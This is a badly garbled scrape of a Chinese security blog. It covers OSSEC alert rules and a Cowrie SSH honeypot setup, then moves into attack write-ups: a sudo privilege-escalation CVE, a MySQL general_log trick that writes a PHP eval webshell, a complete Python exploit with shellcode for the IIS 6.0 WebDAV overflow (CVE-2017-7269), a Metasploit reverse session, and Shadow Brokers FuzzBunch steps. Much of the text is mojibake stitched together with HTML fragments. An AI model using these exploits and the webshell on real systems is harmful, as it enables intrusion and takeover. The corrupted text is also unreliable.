>Vin</p_UCEES_, etc) s,oup> lt;description>AUDITD UCEESSlt;/d</pa d. Tryi Tryinscription> </rule> </gr;rule id="110002"8eve3="10"> 5"S2.equency="5"ser lfrslog,6ertignorog,3 & lt;if_sid>._t; >Vin</p_UCEES_, etc) s_sid>._t; lt;description>AUDITD lt;/d</pa bruall syce tule: 5eneget, etcstuserscription> < </os;description>AUDITD nt lt;/d rultemnscription> </ruatch&g e: /port _ip / lt;match> >Vinatio- wher_, etc) s,oup> lt;dle> </group>

如上var/ossec/bin/ossec-logtest,可获连续五次志内容

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESSORfrom 1772.17.153.36 to 172.17.153.38 distport 3333 .'

**

用户适下:

Jun 11  1: Completed pre-decoding.
       ent: 'Jul 14 11:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESSORfrom 1772.17.153.36 to 172.17.153.38 distport 3333 .'

**name: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESSORfrom 1772.17.153.36 to 172.17.153.38 distport 3333 .'

**nam 2: Completed decoding.
decoder: 'auditServerd'
dstuser: 'blackrat'
status:'SUCEES 'ORfrom 17p: '172.17.153.36'
dstip: '172.17.153.
t8p: : '33 .17. Phase 3: Completed filtering (rules). : '52510' 8 3l: '6' Des15ription: 'SSH inslt;/d</pa bruall syce tule: 5eneget, etcstusernt lt;/d rultemnert to be generated.

如上SEC中已瑊警规则

【OSSEC蜜罐】Cowrie:源ecur/ Trules蜜罐

OSSECh2>0x01 简介r><2于cowrie开源ditSekippo戔文交互sth蜜罐以署W9网到事试OS集恶意IP递富密ule歗典和攻击件以署W914䑜到事试O测糄知和拖了击过6

对于/p>

3.2 Oh2>0x02 目廥署r><2于var/ossec.csth/les.xgt;

对于曰P3 .'22下rsyP3 .'22p>该条测试䉫提服务rultemctrt Clamavowrie与Kippo溠4持R!--动的配置叐动端口22p2需要新增o置d 'Sab #s22端口转斈22p2端口re class="prettyprint">[root@localhost ossec]#yumedoatu.dice ultemctrt al-peandn - sr, failu: Usocalhost ossec]#yumedoatu.dicefirewall-cocal-zone=ey for add-ing fai-33 .=33 .=2p:l =tc :7/03 .=2p22al-peandn - sr, failu: Usocalhost ossec]#yumedoatu.dicefirewall-cocal-peandn gnatual - idey for (default - ex  iincofaail:- ex  port l:- ex  prsysloES dhcpv6-clitus (HITEDI  03 . Jul 2/tc - sr  masquer> :re> - sr  ing fai-33 . Ju33 .=2p:l =tc :7/03 .=2p22:7/addr=- ex  icmp-bst kl:- ex  rich Tryi:- ex      : Usocalhost ossec]#yumedoatu.dicefirewall-cocal-okm/ad- sr, failu

如上斎目owriere class="prettyprint">[root@lyumre ctlog -y epel-okmeCom- sryumre ctlog -y gcc libffing.->pyincnng.->> <-sslng.->g/d pyincnnpip pycrypto- sraddnly ocowrieal6.hehe123- srgd -pt disincs.togd hub.comemichkm/ec]erhof/cowrie.gi - srlam.cl-Rocowrie:cowrieacowrie/- srldacowrie- srmvacowrie.cfg.t 33acowrie.cfg

用户逼辑cowrie.cfg

上斎掉gnaten_33 .'= 22p2。释re class="prettyprint">[root@lpip e ctlog -r .equirele_ds.txt

 

最h2>0x03 斍库目r><2于s="prettyprint">[root@localhost ossec]#re> icepip e ctlog mysql-pyincn: Usocalhost ossec]#re> iceyumre ctlog Oiadb-(or verOiadb-g.->Oiadb: Usocalhost ossec]#re> ice ultemctrt icemysqladmicl-urom 17d. Tryi hehe123

 

最终s="prettyprint">[root@lMOiaDB [(ocal)] < CREATE DATABASEacowrie/gr;rQuery OKirecrow affiles: (0.00 m 1 - exMOiaDB [cowrie] < port /home/cowrie/cowrie/g/e/sql/mysql.sql;- exMOiaDB [cowrie] < pam. Sab #s;- ex+----------- /tm+- ex| Tab #s_in_cowriea|- ex+----------- /tm+- ex| >Vin            a|- ex| clituss         a|- ex| dm.cm/ads       a|- ex| input           a|- ex| keyfinger[roots a|- ex| s<-sors         a|- ex| siluions        a|- ex| t">log          a|- ex+----------- /tm+- ex8crows in abor(0.00 m 1

用户逋试一下rcowrie.cfgs孅Omysql及语揂耐动owriere class="prettyprint">[root@localhost ossec]#cowrie]ce uacowrie- sr[cowrieost ossec]#cowrie]$ .amscanowriea codet use: 5Pyincns: 6tuy --&: 6onm - sr (pidld ruowrie: [twnatd  a--umask 0022al-pidmlinkec/brucanowrie.pidr/lomav.lowrie.e froowriea]..*

用户這斯ule记>最终s="prettyprint">[root@lMOiaDB [cowrie] < pkmect *72.17.>Vin;- ex+----+----------- +------ +------ +------ +------ ---- /tm+- ex| idr| siluion     a| , failua| e a| d. Tryi |ser lun 11          a|- ex+----+----------- +------ +------ +------ +------ ---- /tm+- ex| a1 |sc66e2505a393 |      a1 |scalh    a| hehe123 a| -14T199-13 23:58:48a|- ex+----+----------- +------ +------ +------ +------ ---- /tm+- execrow in abor(0.01 m 1

用户var/os可记>最终s="prettyprint">[root@lMOiaDB [cowrie] < pkmect *72.17.input;- ex+----+----------- +------ --------- +------ +------ +------ +- ex| idr| siluion     a| er lun 11          a| .ealma| , failua| input  a|- ex+----+----------- +------ --------- +------ +------ +------ +- ex| a1 |sc66e2505a393 | -14T199-13 23:58:51 |sNULL a|      a1 |swhoami a|- ex+----+----------- +------ --------- +------ +------ +------ +- execrow in abor(0.01 m 1

用户鈙]添帮>最终s="prettyprint">[root@lMOiaDB [cowrie] < pkmect *72.17.dm.cm/ads\Ghase 33333333333333333333333333 1.crow 33333333333333333333333333- ex      2510'1- ex  prs.99.2 c66e2505a393- exer lun 11: -14T199-14 20171:23- sr     2url:isincs.towww.baidu.comeimg/bd_UCEo1.png- ex  outmlinS dl/264ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a30260;/ifc589847f5- sr   paasum). 4ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a30260;/ifc589847f5- srecrow in abor(0.00 m 1

用户/p>

最h2>0x04 所怂下r><2于re> &nly db.txt皮SSHulebr /> e除此s="prettyprint">[root@localhost ossec]#cowrie]cer/lore> &nly db.txt- srcalh:x:!calh- srcalh:x:!123456- srcalh:x:*

用户txtcocs/*缌可var/os返回下br /> e除此s="prettyprint">[root@localhost ossec]#mscicefigginf- srdf: ASCII Tryi: Usocalhost ossec]#mscicer/lorf- srF Juultem                                              Size  U /|/AvlamdU /% Mounes: cn: Usm 172s                                                  4.7G  731M  3.8G  17% /- srug.-                                                     10M     0   10M   0%ull - exemp2s                                                    25M  192K   25M   1%ulruc- exll it 3k/by-uuid/65626fdc-e4c5-4539-8745-edc212b9b0af  4.7G  731M  3.8G  17% /- sremp2s                                                   5.0M     0  5.0M   0%ulrucast k- sremp2s                                                   101M     0  101M   0%ulrucashm

用户dl/*纆击者置dcurl/wget]" re

Timestaocalhost ossec]#rls /t
- sr
4ca980f97a4f91feecdfbb12486ed9d66f57190a0c4a30260;/ifc589847f5

用户amscaplay通试O重演皯都可䑊警规规寕Omav.t">/所有绥实现剀有甆击者var/os可用

Timestaocalhost ossec]#cowrie]ce.amscaplay  mav.t">/-14T0913-233922-21cf6e129ef5-0i.e f

用户de> &fs.pickle伪装" re席。>http://ooneyf加伪装 re席。嫠" re弚

e除此s="prettyprint">[root@localhost ossec]#cowrie]cer/loooneyfec.cissue : UsDebian GNU/OpenB 7 \n \l

用户mav.lowrie.jsonJSON格彮弌生日忇>http://mav.lowrie.e fmav.ng: 忇>http:///p>

3.2 OSS/p>

【OSSECVE--14T11 367:Sudo件/权漏洞

OSSEC漏洞详情

  <r1、C		用户C		

  <rocalhost ossec]#yumedoatu.dicerpm -qa -v grepsudosr, do-1.8.6p7-16.el7.x86_64

用户v志sudo权限

  <rocalhost ossec]#yumedoatu.dice^10\.|p/20' sec.csudoers
p/20 ALL=(ALL) NOPASSWDbin/auditSesum

用户适

Se4%b8%n c否挐

  <rocalhost ossec]#yumedoatu.dice^e			 syce 
E	 sycinf

用户鼏权建/> sincs.togd hub.comec0d3z3r0csudo-CVE--14T11 367

  <rop/20ost ossec]#emp]$ ll sec.cmotd
-rw-r--r--.recroive oive106 如上斌该sec.cmotd <盖hre

对于曋列 rel="/>

作者(7 vca-7ssec]#empus- .ore>

9>3.輇heezyr4、SUSE>9>3.輇h 盖hr輇h "r>7494Sesum h响biandpkgr/h 3 jr0h4.6.4/4 jrs0/4 4.14ontent间bianesum eader>!-- .e

用定t">ba84%eader>ent"> 如%e5 bttyprip3.4lEC默认p3.4ll序新m 1772.对于. sec.cs器打开IDCEESS2打印机<享叐445vinc其能otd介r><23.36问.' **Ale <享DCEESS拥ub.comec0d3z3r0.' **A3. sditS     猜解h ec.cs叅享0260;/.1sre :sad oe

用满足"> 'Fi序y-conts="ate%8%a5%otd为opw;用 r4机772Kali **Ph> .180do-CVE--14T11 367

3

6iles: mba84%e6%b3cee/"a8;/pa bllun 5the盖 %8b8b%e9b%a3ee/"a0Mes: ba84%;/pa bllun Ghe盖 bb%e5ce8feb%e54%9="bookmark">【OSSECVE--14T11 367:Sudo件/权漏洞 -is/ossec持久化定时任务道理.'22p>pre-dee5d/ossec皯  ad] / p警规> [root@lM12iaDB [(mes: wrie]SET- ;/pa bllun _ar/o='E:/WWW/cmd.php';最终s="pre0   nt">[root@lM- +--[(mes: wrie] < vn abl.sq!--ke "%;/pa b%";  a|- ex| siluionsa|- ex| siluionsex+-Vn abl.s38 diUDIT+-Vnlue |  a|- ex| siluionsa|- ex| siluionsex+-;/pa bllun | ON |+-;/pa bllun _ar/os| E:/WWW/cmd.php |  a|- ex| siluionsa|- ex| siluionsex2     a|- ex|0iaDB [(mes: wrie]SELECT 't;ma?php @motert($_POST["cmd"]);?wrie';  a|- ex| siluions|- ex| siluionsex+-t;ma?php @motert($_POST["cmd"]);?wrie |  a|- ex| siluions|- ex| siluionsex+-t;ma?php @motert($_POST["cmd"]);?wrie |  a|- ex| siluions|- ex| siluionsexaasum). 4ca980f97a4f91feecdfbb12ard">header class="entry-headewp /uper"> 123-7.jpg8b8b%e9lightbox-ook4"rverclass="entry-headewp /uper"> 123-7.jpg8balt="" p dth="930s="eight4%946"rveritSerass="entry-headewp /uper"> 123-7.jpg 930w, ass="entry-headewp /uper"> 123-7-300x79.jpg 300w, ass="entry-headewp /uper"> 123-7-768x203.jpg 768w" siztr(max-p dth: 930px)s100vw, 930px"CVE/vinc/prUbuneinc菜刀连 即可ditSesum int">:8u4 r4pre- 置文Mes: lasWeb0260;/.1comec0d3z3r010e&重 将Web0260;sec-l>0x02777ontsp/20o8.10pe> cod0 m 1 d hub.cp>2. udo-CVE--14T11 367 <2-- .entry-meta -<2-
4/24/i -6-tr全b class="entry-title"> 72699ce9cee/" re%e"bookmark">【OSSEC蜜罐】Cowrie:源ecur/ Trules蜜罐 使k">3f57110.5.1p>EC是 lterin 2003R2dr1.8.IIS6.0hreWebDAVsec.csde>ScStorst3PathFUrl函erd篹audi篹a溢osseader>10e&5 b       owr“If:-t;maass="en”sudo+- eCowriePROPFIND请le_di3.4l任意ttypriditeeader>3f上斻何">3f57110.5.1p>sudoerWebDAVdlhum >3f佱响bian">3f57110.5.1p>EC是 lterin 2003 R2dlhum >3f r4环境">3f57110.5.1p> **Ph> .162 EC是 2003 SP2 32位以( r464位d] / pubec]#em/Debpre>dlhum >3fPOC">3f57110.5.1p>adb: Usocalhost ossec]#re> icemysqla#ex| siluionsOurt adg4ca9up a ROP cha. by#cowriechaloexpflum)3- --. It p by#Zhiniarie]eiscond C195 Wu. I更彮叀 lt9urity Lab & Schooluoco2.17ue| Science & EngOS7dstip, S4 2h C1ina Uniexplity ocoTechnoun y Guarizhou, C1ina歜#x| siluionsEmail: edloESz@foxmail rel歜im. Trsockecal-zoock = sockec.sockec(sockec.AF_INET, sockec.SOCK_STREAM)al-zoockn>[r((' **Ph> .162',80))al-z ='PROPFIND / HTTP/1.1\r\nH!--: **Ph> .162\r\nCh1> -Leisth: 0\r\n'al-z +='If:-t;maass="en **Ph> .162/aaaaaaa'al-z +='\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80\xb3\xe3\x95\xb7\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'al-z +='wrie'al-z +=' (ec]#t;ma  token:d cou1wrie)-t;maass="en **Ph> .162/bbbbbbb'al-z +='\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'al-z盖 o 17='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U> Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA'al-z +=盖 o 17al-z +='wrie\r\n\r\n'al-z mysqt al-zoocksend( )al-zrie] = sock.recv(80960)al-z mysqtrie]al-zoocklosefeecdfbb>3f r4calh-">3f57110.5.1p>sudoer了计算机进程伪>header class="entry-headewp /uper"> 4 123-8.jpg8b8b%e9lightbox-ook 4 123-8.jpg8balt="" p dth="395s="eight4%191"rveritSerass="entry-headewp /uper"> 4 123-8.jpg 395w, ass="entry-headewp /uper"> 4 123-8-300x145.jpg 300w" siztr(max-p dth: 395px)s100vw, 395px"CVE/vinc/prUb>3fMSF r4〼">3f57110.5.1p>>对于曋列 rel=dmc盖 % relsreset-</t; blob marypt dn resets/wC是/i /try-meta"7269.rbe

用拷贝cmotdshase/ relsreset-</t; dn resets/wC是/i 添帺溋sec.cmotdinc写冝msf-r--r-ution reset/wC是/i /try-meta"7269msf-n reset(try-meta"7269) wrie] he r -ops **Ph> .162 r -ops=wrie] **Ph> .162 msf-n reset(try-meta"7269) wrie]n reset此*] ec]#ctdtreexple TCP h"pol3.on **Ph> .17n:4444 此*] eenule: ost3t@957487 bytes)uditServePh> .162此*] Mre| dmre| 333333 1yumreoot@ **Ph> .17n:4444 -wrie] **Ph> .162:1984) at33333334-24 11:56sc66+080歜mre| dmre| wrie] ys更 2.17ue| : VINCENT OS : EC是 .NET lterin (Build 3790, lter tPack 217.1Archcoucterin: x86 lSc]#ms Langust3t: zh_CN Doma. : EORKGROUP LoggootOn14 11s : 3etMre| dmre| :[x86/wC是feecdfbb12486ed9d66f5713 help' sysstd">3f57110.5.1p>>对9.2 c66tuicoolst/syntax/headfMrEn2hre

对cs.org/en/latest/syvuls/130531>对于 rel="4䤄/>

<18- .entry-meta -<18
4/20/6habrok!- dlass3cee/"a8%e5/25title.toss=5%8b8b%e9b%a3ee/"a0%haBrok!-工认inc r4〼"e9cee/" re%e"bookmark">【OSSEC蜜罐】Cowrie:源ecur/ Trules蜜罐 3f57110.5.1p> . 在r -6 ">< 8 imelascherve “%ha Brok!-s” +- e客组织号称恶愈IDC$ ec组织窃n/au大量机< <件并将部ttpogin Sgsudomatc联<23.3e_diC$ ec(Equ叀 Group)据称e5d NSA(美国国家属于局)re%e+- e客组织67着极高hrefcla手段dite&部ttpc.tsudde> &fs.pi括.cmo隐  地e> <- e客工ate"ec “%ha Brok!-s” 还保留mat部ttpogin Se_di3算owr sud拍卖 形/v售给v价最高hre竞价84%e_d“%ha Brok!-s” 扠弚格e5d > 万比特币(值接近5亿美元)dite“%ha Brok!-s” +- 工许直fcv udo-CVE-le <京典和33333 ">< 4 ime 8 ie_d“%ha Brok!-s” s.ent保留部ttp+- 解压缩用户67人将其解压缩琎onten传oG列<2站提供M  udo-CVE-3e <京典和33333 ">< 4 ime 14 i晚onts 'FtSe次 sud解压文e_d“%ha Brok!-s” 在推特 'Fiv了第二波保留<- ettpogin Se_di笡ELLO 其中i括新<- 23rvee客工atedo-CVE-这re客工c.t名为OddJobe_dEasyBeee_dEt----lRomancee_dFuzzBunche_dEdua56=dScholare_dEskimoRolle_dEclipsedECge_dEsteemAudite_dEng ePulsar等udlhum >3f䏗佱响EC是bian">3f57110.5.1p>EC是 NT!-EC是 2000 hrEC是 XP hrEC是 2003 hrEC是 Vista hrEC是 7 hrEC是 8!-EC是 2008 hrEC是 2008 R2 hrEC是 lterin 2012 SP0伪>header class="entry-headewp /uper"> 4 123-7.jpg8b8b%e9lightbox-ook 4 123-7.jpg8balt="" p dth="1459s="eight4%506"rveritSerass="entry-headewp /uper"> 4 123-7.jpg 1459w, ass="entry-headewp /uper"> 4 123-7-300x104.jpg 300w, ass="entry-headewp /uper"> 4 123-7-768x266.jpg 768w, ass="entry-headewp /uper"> 4 123-7-1024x355.jpg 1024w" siztr(max-p dth: 1459px)s100vw, 1459px"CVE/vinc/prUb>3f工许 ">3f57110.5.1p> )]ce ua2.6和pywC32oot@lpi(注意-dee5d32位X然会导致调incd

对cs.6e2505a393-s/1jHKw0AU 用户67kuij或定omShabrok!-ivNSA   工do-CVE->对于曋列 rel=me- srch0c/6habrok!-do-CVE-wC是: i括 EC是上斷, 植ec.cisditS软ec/ 和cher   ttyprie

用swift: i括 银4ll  ontenerickle

用oddjob: i括与ODDJOB 门hcp>2docdo-CVE-3)re招O工do-CVE->对于曋列 rel=c  rcept/do> epulsar-deouct-ing (rdlhum >3f r4环境">3f57110.5.1p> **Ph> .128 Kalire clas1 **Ph> .174 EC是 2003 SP2  rle歗场re clas1 **Ph> .176 EC是 XP SP--- 睶场(置文cp>闭防火墙udoer防火墙会拦截445叐有dlhum >3fFUZZBUNCH框架 r4〼">3f57110.5.1p>FuzzBunch点://似- relsreset并且c链平台ont/ossecfb.pyincatedo-CVE-- 在C:\6habrok!-\wC是e> t;172<0260;ie- srle: